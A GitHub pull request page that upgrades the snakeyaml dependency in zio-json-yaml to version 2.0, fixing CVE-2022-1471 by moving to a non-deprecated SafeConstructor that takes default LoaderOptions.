Update snakeyaml dependency to 2.0 #974
Merged
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Related to #973
snakeyaml 1.33 is vulnerable to cve CVE-2022-1471, which has a severity high or critical depending on different analysis https://nvd.nist.gov/vuln/detail/CVE-2022-1471
zio-json-yaml uses the vulnerable constructor, but 2.0 fixes the issue: https://www.veracode.com/blog/research/resolving-cve-2022-1471-snakeyaml-20-release-0
2.0 removes deprecated constructor for SafeConstructor class, so we should use another one, using a default LoaderOptions, like the previous constructor (diff of old constructor: https://bitbucket.org/snakeyaml/snakeyaml/diff/src/main/java/org/yaml/snakeyaml/constructor/SafeConstructor.java?at=master&diff2=3e755d254aeaa902675053047fd53368a175565a )
I removed the nowarn annotation, because it triggers a warning, since there is no warning anymore (because of uage of deprecated constructor)